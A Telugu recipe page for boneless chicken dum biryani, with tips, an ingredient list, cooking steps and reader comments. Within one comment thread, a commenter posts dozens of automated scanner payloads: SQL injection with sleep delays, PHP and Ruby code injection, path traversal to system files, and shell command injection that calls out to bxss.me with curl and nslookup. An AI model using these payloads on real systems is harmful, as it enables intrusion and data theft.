బిర్యానీ అంటే యావత్ ప్రపంచానికి ఎంతో ఇష్టం. ప్రాంతాన్ని బట్టి బిర్యానీ రుచి సువాసన రూపం అన్నీ మారిపోతుంటాయ్. అలా ఇది కూడా ఆంధ్రాలో పుట్టిన రెసిపి. అసలుకైతే ఆంధ్రాలో ఈ రెసిపిలో అజీనమోటో, చిల్లీ సాస్లు కూడా వేస్తారు నేను వేయలేదు. బిర్యానీ అంటే కరివేపాకు వేయారు, కానీ ఇది తెలుగు వారి వంట కదా మరి, కరివేపాకు ఉండాల్సిందే!

ఈ బిర్యానీ రెసిపీ కాస్త జాగ్రత్తగా ఫాలో అయితే బ్యాచిలర్స్ కూడా సులభంగా చేసేయొచ్చు. ఈ రెసిపీలో చికెన్ ఉడకలేదు అనే సమస్య ఉండదు. సరైన కొలతలో రైస్ కి నీళ్ళు పోసుకుంటే చాలు. పర్ఫెక్ట్ బిర్యానీ తయారు.

ఈ బిర్యానీ తో చల్లని రైతా చాలా బాగుంటుంది.

Boneless Chicken Dum Biryani | Hyderabadi Boneless Chicken Dum Biryani Recipe

టిప్స్

హైదరాబాదీ ధం బిర్యానీ కి ఈ బోన్లెస్ చికెన్ ధం బిర్యానీకి తేడా?

ఇది హైదరాబాదీ దం బిర్యానీ కి మల్లె ధం చేస్తారు అంతే. కానీ దీని వాడే మసాలాల ఘాటు, కారం చాలా ఎక్కువ. పైగా ఇందులో చికెన్ ఫ్రై చేసి ధం చేస్తారు. హైదరాబాదీ చికెన్ ధం బిర్యానీ లో పచ్చి చికెన్ ని మసాలాలతో నానబెట్టి దాన్ని ధం చేస్తారు. ఆ ధం మీద చికెన్ మగ్గిపోతుంది. ఈ బిర్యానీ కి చికెన్ కి మసాలాలు పట్టించి ఫ్రై చేసి ఆ ఫ్రైతో ధం చేస్తారు.

బిర్యానీ కోసం చికెన్ ఇలా రెడీ చేసుకోండి:

• చికెన్ వండటానికి ముందు 1 tbsp ఉప్పు వేసిన నీళ్ళలో కడిగిన చికెన్ వేసి గంట పైన నానబెట్టాలి, అప్పుడు చికెన్ సాఫ్ట్ అవుతుంది. లేదంటే రబ్బర్ లా ఉంటుంది.

• ఇంకా చికెన్ కోటింగ్ కి చాలా మంది కార్న్ ఫ్లోర్/మైదా కి బదులు ఏమి వాడుకోవచ్చు అని అడుతుంటారు. ఈ రెండింటిలో ఏది లేకపోయినా బియ్యం పిండి వాడుకోవచ్చు. కానీ బియ్యం పిండి కోటింగ్ డ్రైగా అవుతుంది, ఎక్కువ క్రిస్పీగా ఉంటుంది చికెన్. మైదా ఇష్టం లేకపోయినా బియ్యం పిండి అయితే వాడుకోవచ్చు.

• చికెన్ ముక్కలు కాస్త మెడియం సైజు ఉండాలి. లేదంటే వేగాక చికెన్ మరీ చిన్నవిగా అయిపోతాయ్.

బిర్యానీ కి ఏ రైస్ మంచిది?

• సాధారణంగా అందరూ నన్ను అడిగే ప్రశ్న ఏ బిర్యానీ రైస్ మంచిది? నేను బ్రాండ్ కంటే, సంవత్సరం కంటే పాత బాస్మతి బియ్యం వాడుకుంటే ఎప్పుడు చేసినా పర్ఫెక్ట్ గా వస్తుంది బిర్యానీ అంటాను!

బిర్యానీ రైస్ పొడిపొడిగా రావాలంటే?

• బాస్మతి బియ్యం ఎప్పుడూ ఎసరు మరుగుతుండగా వేయాలి. అప్పుడు మెత్తబడదు బియ్యం.

• బిర్యానీ రైస్ 60% ఉడికించాలి ధం చేయడానికి, కాని 60% ఎలా తెలుసుకోవాలి అని అడుగుతుంటారు? అన్నం ఉడుకుతుండగా ఓ మెతుకు నోట్లో వేసుకుంటే తెలిసిపోతుంది. సగం పైన ఉడికుండాలి, ఇంకా కాస్త పలుకుగా ఉండాలి అది 60% ఉడకడం అంటే.

ఉప్పు ఎక్కువగా వేయాలి.

• బిర్యానీకి కోసం మరిగే ఎసరులో ఉప్పు ఎక్కువగా వేయాలి. ఎక్కువా అంటే ఎసరు నీరు సముద్రపు నీరంత ఉప్పగా ఉండాలి. అప్పుడు ఉప్పు బియ్యనికి పడుతుంది. ఉప్పు తగ్గితే ఇక మళ్ళీ బిర్యానీలో ఉప్పు వేయలేము.

బిర్యానీకి ధం ఎంత సేపు?

• నేను తీసుకున్న కొలతకి 8 నిమిషాలు హై-ఫ్లేమ్ 5 నిమిషాలు లో –ఫ్లేమ్ మీద ధం చేసుకుంటే సరిపోతుంది. తరువాత స్టవ్ ఆపేసి 20 నిమిషాలు వదిలేయాలి.

• కానీ బిర్యానీ డబుల్ చేసుకున్నప్పుడు మరో 7 నిమిషాలు ఎక్కువగా ధం చేసుకుంటే సరిపోతుంది.

• బిర్యానీ ధం అరిటాకు, విస్తరాకు, లేదా మైదా పిండి ముద్దతో సీల్ చేసి ఎలాగైనా చేసుకోవచ్చు.

• ఈ బిర్యానీ లో నేను మసాలాలు కాస్త ఎక్కువగా వాడాను. కావాలంటే మీకు తగినట్లుగా తగ్గించుకోవచ్చు.

Boneless Chicken Dum Biryani | Hyderabadi Boneless Chicken Dum Biryani Recipe

బోన్లెస్ చికెన్ ధం బిర్యానీ - రెసిపీ వీడియో

Boneless Chicken Dum Biryani | Hyderabadi Boneless Chicken Dum Biryani Recipe | How to Make Hyderabadi Boneless Chicken Dum Biryani

Non Veg Biryanis | nonvegetarian
  • Prep Time 10 mins
  • Cook Time 40 mins
  • Resting Time 20 mins
  • Total Time 1 hr 10 mins
  • Servings 3

కావాల్సిన పదార్ధాలు

  • చికెన్ ఫ్రై కోసం
  • 1/2 kilo బోన్లెస్ చికెన్ (గంట ఉప్పు వేసిన నానబెట్టినది)
  • ఉప్పు- కొద్దిగా
  • 1 tsp కారం
  • 1 tsp ధనియాల పొడి
  • 1 tsp వేయించిన జీలకర్ర పొడి
  • చిటికెడు పసుపు
  • 1 tbsp మైదా
  • 1 tbsp కార్న్ ఫ్లోర్
  • 1 tsp నిమ్మరసం
  • 1/2 tsp అల్లం వెల్లూలి ముద్ద
  • 2 tbsps నీళ్ళు
  • నూనె వేపుకోడానికి
  • చికెన్ గ్రేవీ కోసం
  • 2 tbsps నూనె
  • 1 tbsp నెయ్యి
  • 1/2 tsp జీలకర్ర
  • 2 పచ్చిమిర్చి- చీలికలు
  • 3 వెల్లూలి
  • 2 కరివేపాకు
  • 2 tbsp ఉల్లిపాయ తరుగు
  • 2 tsp టమాటో తరుగు
  • 2 tbsps కొత్తిమీర, పుదీనా తరుగు
  • 1 tsp నిమ్మరసం
  • 1.5 tsp కారం
  • 1 tsp ధనియాల పొడి
  • 1 tsp జీలకర్ర పొడి
  • 1/2 tsp గరం మసాలా
  • 1/2 tsp అల్లం వెల్లూలి ముద్ద
  • 1/2 cup పెరుగు
  • 75 ml నీళ్ళు
  • బిర్యానీ కోసం
  • 1.5 cups బాస్మతీ బియ్యం (275gm)
  • 2.5 liters నీళ్ళు
  • 3 అనసపువ్వు
  • 3 మరాటి మొగ్గ
  • 1 జాపత్రి
  • 1 inch దాల్చిన చెక్క
  • 5 లవంగాలు
  • 5 యాలకలు
  • 1 tsp షాహీ జీరా
  • 1/2 tsp అల్లం వెల్లూలి పేస్టు
  • 2 tbsps ఉప్పు
  • 1/4 cup పుదీనా, కొత్తిమీర తరుగు
  • 1 tbsp నెయ్యి
  • 2 tsp నూనె
  • 1/2 cup నీళ్ళు
  • 2 tbsp వేయించిన ఉల్లిపాయ (ఆప్షనల్)
  • యాలకల పొడి- చిటికెడు (ఆప్షనల్)

విధానం

  1. గంట పాటు ఉప్పు నీటిలో నానబెట్టిన చికెన్కి మసాలాలు అన్నీ బాగా పట్టించండి.
  2. బాగా వేడెక్కిన నూనె మంట తగ్గించి చికెన్ ముక్కలు వేసి మీడియం ఫ్లేం మీద మాత్రమే ఎర్రగా, క్రిస్పీగా వేపుకుని తెసుకోండి (ముక్కలు వేగడానికి కాస్త టైం పడుతుంది)
  3. పాన్ లో నూనె నెయ్యి వేసి వేడి చేసుకోవాలి
  4. తరువాత జీలకర్ర, వెల్లూలి తరుగు, పచ్చిమిర్చి చీలికలు వేసి హై-ఫ్లేం మీద వేపుకోవాలి.
  5. పచ్చిమిర్చి వేగాక ఉల్లిపాయ తరుగు, కరివేపాకు తరుగు వేసి వేపుకోవాలి.
  6. తరువాత టమాటో తరుగు వేసి మెత్తబదేదాక వేపుకోవాలి. లేదా టమాటో కేట్చప్ కూడా 1 tsp వేసుకోవచ్చు
  7. అల్లం వెల్లూలి ముద్దా, కారం, ఉప్పు, ధనియాల పొడి, జీలకర్ర పొడి, గరం మసాలా వేసి వేపుకోవాలి.
  8. ఆ తరువాత మంట పూర్తిగా తగ్గించి చిలికిన పెరుగు వేసి బాగా కలుపుతూ వేపుకోవాలి లేదంటే తరకలుగా మిగిలిపోతుంది.
  9. పెరుగు మసాలాల్లో బాగా కలిసాక, ఫ్రై చేసిన చికెన్ వేసి హై ఫ్లేం మీద బాగా పట్టించండి.
  10. తరువాత కొద్దిగా నీళ్ళు పోసి బాగా కలిపి హై ఫ్లేం మీద గ్రేవీలోంచి నూనె పైకి తేలేదాకా ఫ్రై చేయాలి.
  11. నూనె పైకి తేలాక, కొత్తిమీరా, పుదినా తరుగు, కరివేపాకు ఓ రెబ్బ వేసి కలిపి స్టవ్ ఆపేసి నిమ్మరసం పిండి దిమ్పెసుకోవాలి.
  12. నీళ్ళు మరిగించి ఉన్న మసాలా దినుసులన్నీ ఇంకా ఉప్పు, పుదీనా, కొత్తిమీర తరుగు వేసి హై-ఫ్లేం మీద నీళ్ళని తెర్ల కాగనివ్వాలి
  13. 2. నీళ్ళు తెర్లుతున్నప్పుడు నానబెట్టిన బాస్మతి బియ్యం వేసి హై ఫ్లేం మీద 60% ఉడకనివ్వాలి (60% అంటే సగం పైన ఉడికుండాలి ఇంకా కాస్త పలుకుండాలి మెతుకు).
  14. కచ్చితంగా అడుగు మందంగా ఉన్న గిన్నెలో 60% ఉడికిన రైస్ వడకట్టి ఓ పొరగా వేసుకోండి.
  15. బియ్యాన్ని హై-ఫ్లేం మీద మరో 3 నిముషాలు ఉడికిస్తే 70% అవుతుంది, దాన్ని 60% ఉడికిన రైస్ మీద వేసుకోండి.
  16. ఆ పైన ఫ్రై చేసిన చికెన్ వేసుకోండి. నాకు చికెన్ గ్రేవీ డ్రై అవ్వడం వల్ల 50 ml ఎసరు నీళ్ళు పోసి కలిపి వేసుకున్నాను (చికెన్ కి గ్రేవీ ఉంటె బిర్యానీ రుచిగా ఉంటుంది)
  17. 2 నిమిషాలు ఉడికిస్తే 80% ఉడికిపోతుంది ఆ రైస్ పల్చని పొరలా వేసుకోండి
  18. నెయ్యి లో నూనె వేసి కలిపి బిర్యానీ పైన గిన్నె అంచుల వెంట వేసుకోండి.
  19. అలాగే ఫ్రైడ్ ఆనియన్ వేసుకోండి(ఆప్షనల్)
  20. బియ్యం ఉడకగా ఉన్న ఎసరు నీళ్ళు 125 ml అంటే 1/2 కప్ గిన్నె అంచుల వెంట పోసుకోండి
  21. పైన 1/4 tsp యాలకలపొడి చల్లుకోండి ఫ్లేవర్ బాగుంటుంది (ఇది ఆప్షనల్)
  22. బిర్యానీని టిష్యూ నాప్కిన్స్, అరటాకు, విస్తరాకు తో ధం చేసుకోండి. లేదా మైదా పిండి తో గిన్నె అంచులని సీల్ చేసి కూడా ధం చేసుకోవచ్చు
  23. టిష్యూ నాప్కిన్స్ వాడితే నీళ్ళు చిలకరించి 15 నిమిషాలు ధం చేసుకోవాలి. 8 నిమిషాలు హై ఫ్లేం మీద, 7 నిమిషాలు లో ఫ్లేం మీద తరువాత 15 నిమిషాలు స్టవ్ ఆపేసి ఉంచాలి.
  24. మొత్తానికి 30 నిమషాల తరువాత తీసి అడుగు నుండి అట్లకాడతో తీసి సర్వ్ చేసుకోండి.

Leave a comment

Rate this Recipe:
Your email address will not be published.

107 comments

  • A
    A chandra sekhar reddy
    Recipe Rating:
    Resipi అదిరిపోయింది బాసూ
  • M
    Manikanta
    Your videos was very nice We are studying in hotel management your videos are so useful to cooking and learning new things if you tell continental dish are separate page . It is so useful to our college our college students you do so many videos Letters introduce golden time food items like Andhra Pradesh aur jonnalu ragulu sajjalu like Our grandma cooking thank you
  • I
    Imambi
    Recipe Rating:
    Me recipe wow antey inka chepadinke em le
  • I
    Intel
    where and when to add cashew if we want in it?
  • A
    Aman
    Recipe Rating:
    Really yummy biryani!!
  • J
    Janusri
    U r king chef
  • M
    M r
    Recipe Rating:
    This turned out really well everytime !!! 🙂
  • M
    Mohith
    Recipe Rating:
    I love this recepie
  • A
    AshmaSheik
    Wow biryani superb
  • J
    Jaya rani thippivathi
    Recipe Rating:
    I tried this recipe its very tasty
  • A
    Anuraag Chandra
    Recipe Rating:
    Very nice recipe Annayya.
  • N
    Navyadeepika
    Recipe Rating:
    I cook this biryani every Sunday....every time the output is excellent .... yummiest biryani ever....Thank you vismai food keep going🙂
    • K
      kEMlzpAX
      Recipe Rating:
      @@pgvrU
    • K
      kEMlzpAX
      Recipe Rating:
      1????%2527%2522\'\"
    • K
      kEMlzpAX
      Recipe Rating:
      1'"
    • K
      kEMlzpAX
      Recipe Rating:
      1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
    • K
      kEMlzpAX
      Recipe Rating:
      1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
    • K
      kEMlzpAX
      Recipe Rating:
      1CUDGHTCx')) OR 495=(SELECT 495 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1ZmGG2iSs') OR 630=(SELECT 630 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1NxN0F7lC' OR 86=(SELECT 86 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1)) OR 794=(SELECT 794 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1) OR 170=(SELECT 170 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 OR 535=(SELECT 535 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1TFOZRXbW'; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1); waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
    • K
      kEMlzpAX
      Recipe Rating:
      10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
    • K
      kEMlzpAX
      Recipe Rating:
      10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
    • K
      kEMlzpAX
      Recipe Rating:
      1*if(now()=sysdate(),sleep(15),0)
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 3+834-834-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 2+834-834-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1MSday1p7
    • K
      kEMlzpAX
      Recipe Rating:
      [php]print(md5(31337));[/php]
    • K
      kEMlzpAX
      Recipe Rating:
      {php}print(md5(31337));{/php}
    • K
      kEMlzpAX
      Recipe Rating:
      print(md5(31337));//
    • K
      kEMlzpAX
      Recipe Rating:
      '{${print(md5(31337))}}'
    • K
      kEMlzpAX
      Recipe Rating:
      '.print(md5(31337)).'
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}\
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}
    • K
      kEMlzpAX
      Recipe Rating:
      ";print(md5(31337));$a="
    • K
      kEMlzpAX
      Recipe Rating:
      ';print(md5(31337));$a='
    • K
      kEMlzpAX
      Recipe Rating:
      ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
    • K
      kEMlzpAX
      Recipe Rating:
      gethostbyname(lc('hitpc'.'fchsvwjtd6230.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(80).chr(115).chr(66)
    • K
      kEMlzpAX
      Recipe Rating:
      ".gethostbyname(lc("hitex"."dytmecssb2a16.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(76).chr(116).chr(89)."
    • K
      kEMlzpAX
      Recipe Rating:
      '.gethostbyname(lc('hitwm'.'vkfvlsad99a5c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(67).chr(120).chr(72).'
    • K
      kEMlzpAX
      Recipe Rating:
      ./1
    • K
      kEMlzpAX
      Recipe Rating:
      ../1
    • K
      kEMlzpAX
      Recipe Rating:
      file:///etc/passwd
    • K
      kEMlzpAX
      Recipe Rating:
      '"
    • K
      kEMlzpAX
      Recipe Rating:
      vismaifood.com
    • K
      kEMlzpAX
      Recipe Rating:
      https://vismaifood.com/
    • K
      kEMlzpAX
      Recipe Rating:
      xfs.bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      boneless-chicken-dum-biryani-hyderabadi-boneless-chicken-dum-biryani-recipe-how-to-make-hyderabadi-boneless-chicken-dum-biryani/.
    • K
      kEMlzpAX
      Recipe Rating:
      )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
    • K
      kEMlzpAX
      Recipe Rating:
      boneless-chicken-dum-biryani-hyderabadi-boneless-chicken-dum-biryani-recipe-how-to-make-hyderabadi-boneless-chicken-dum-biryani
    • K
      kEMlzpAX
      Recipe Rating:
      boneless-chicken-dum-biryani-hyderabadi-boneless-chicken-dum-biryani-recipe-how-to-make-hyderabadi-boneless-chicken-dum-biryani
    • K
      kEMlzpAX
      Recipe Rating:
      '+'A'.concat(70-3).concat(22*4).concat(112).concat(75).concat(103).concat(67)+(require'socket' Socket.gethostbyname('hitmm'+'gscyrcyy2b099.bxss.me.')[3].to_s)+'
    • K
      kEMlzpAX
      Recipe Rating:
      'A'.concat(70-3).concat(22*4).concat(103).concat(86).concat(100).concat(78)+(require'socket' Socket.gethostbyname('hitrs'+'fgjranki860fd.bxss.me.')[3].to_s)
    • K
      kEMlzpAX
      Recipe Rating:
      "+"A".concat(70-3).concat(22*4).concat(113).concat(75).concat(105).concat(83)+(require"socket" Socket.gethostbyname("hitnk"+"znkdasnhfc9f5.bxss.me.")[3].to_s)+"
    • K
      kEMlzpAX
      Recipe Rating:
      1"||sleep(27*1000)*dbxolu||"
    • K
      kEMlzpAX
      Recipe Rating:
      1'||sleep(27*1000)*lhxydz||'
    • K
      kEMlzpAX
      Recipe Rating:
      1"&&sleep(27*1000)*pxrkfb&&"
    • K
      kEMlzpAX
      Recipe Rating:
      1'&&sleep(27*1000)*ypkmgg&&'
    • K
      kEMlzpAX
      Recipe Rating:
      '"()
    • K
      kEMlzpAX
      Recipe Rating:
      ^(#$!@#$)(()))******
    • K
      kEMlzpAX
      Recipe Rating:
      ;(nslookup -q=cname hitigkwmgcjiu3c927.bxss.me||curl hitigkwmgcjiu3c927.bxss.me)|(nslookup -q=cname hitigkwmgcjiu3c927.bxss.me||curl hitigkwmgcjiu3c927.bxss.me)&(nslookup -q=cname hitigkwmgcjiu3c927.bxss.me||curl hitigkwmgcjiu3c927.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      !(()&&!|*|*|
    • K
      kEMlzpAX
      Recipe Rating:
      `(nslookup -q=cname hitmhaictrfdl2af95.bxss.me||curl hitmhaictrfdl2af95.bxss.me)`
    • K
      kEMlzpAX
      Recipe Rating:
      |(nslookup -q=cname hitppxdimigqq3df24.bxss.me||curl hitppxdimigqq3df24.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      &(nslookup -q=cname hitkzkjaotfrdfd534.bxss.me||curl hitkzkjaotfrdfd534.bxss.me)&'\"`0&(nslookup -q=cname hitkzkjaotfrdfd534.bxss.me||curl hitkzkjaotfrdfd534.bxss.me)&`'
    • K
      kEMlzpAX
      Recipe Rating:
      &nslookup -q=cname hitscfzdoiprne9f23.bxss.me&'\"`0&nslookup -q=cname hitscfzdoiprne9f23.bxss.me&`'
    • K
      kEMlzpAX
      Recipe Rating:
      $(nslookup -q=cname hitktprhfpcuj8c378.bxss.me||curl hitktprhfpcuj8c378.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      (nslookup -q=cname hitqclxbrycfi0d870.bxss.me||curl hitqclxbrycfi0d870.bxss.me))
    • K
      kEMlzpAX
      Recipe Rating:
      c:/windows/win.ini
    • K
      kEMlzpAX
      Recipe Rating:
      1|echo ozffta$()\ wyucbz\nz^xyu||a #' |echo ozffta$()\ wyucbz\nz^xyu||a #|" |echo ozffta$()\ wyucbz\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      ../../../../../../../../../../../../../../etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      |echo ymplux$()\ jhgmcc\nz^xyu||a #' |echo ymplux$()\ jhgmcc\nz^xyu||a #|" |echo ymplux$()\ jhgmcc\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      /etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      1&echo nzeaug$()\ rrhscp\nz^xyu||a #' &echo nzeaug$()\ rrhscp\nz^xyu||a #|" &echo nzeaug$()\ rrhscp\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      http://bxss.me/t/fit.txt?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      Http://bxss.me/t/fit.txt
    • K
      kEMlzpAX
      Recipe Rating:
      &echo ujvkzi$()\ inmtiy\nz^xyu||a #' &echo ujvkzi$()\ inmtiy\nz^xyu||a #|" &echo ujvkzi$()\ inmtiy\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      echo shalno$()\ tkfjua\nz^xyu||a #' &echo shalno$()\ tkfjua\nz^xyu||a #|" &echo shalno$()\ tkfjua\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      1&n976086=v996138
    • K
      kEMlzpAX
      Recipe Rating:
      ${9999096+9999166}
    • K
      kEMlzpAX
      Recipe Rating:
      12345'"\'\");|]*{ ?''💡
    • K
      kEMlzpAX
      Recipe Rating:
      "+response.write(9342457*9868083)+"
    • K
      kEMlzpAX
      Recipe Rating:
      '+response.write(9342457*9868083)+'
    • K
      kEMlzpAX
      Recipe Rating:
      response.write(9342457*9868083)
    • K
      kEMlzpAX
      Recipe Rating:
      A0Pqcnpp: 4JzA13d8
    • K
      kEMlzpAX
      Recipe Rating:
      P1YmzCIr
  • L
    Lavanya Parchuri
    Recipe Rating:
    Ur explanation too good sir ,i will definitely try this recipe, my mother big fan of u sir
  • P
    Pavan Kumar Reddy A
    Recipe Rating:
    I am chicken lover..i love all chicken varieties.. especially biryani lover..thank u bro for these delicious recipes..🤡🤡
  • A
    Alekhya
    Recipe Rating:
    nice and tasty
    • V
      Venkat Sai Jarugula
      Recipe Rating:
      I tried this recipe Anna. Really came out well
  • B
    Bhasker
    I have tried this recipe many times..
  • R
    Rajendher
    Recipe Rating:
    Super
  • K
    Kiran
    Superb bro
Boneless Chicken Dum Biryani | Hyderabadi Boneless Chicken Dum Biryani Recipe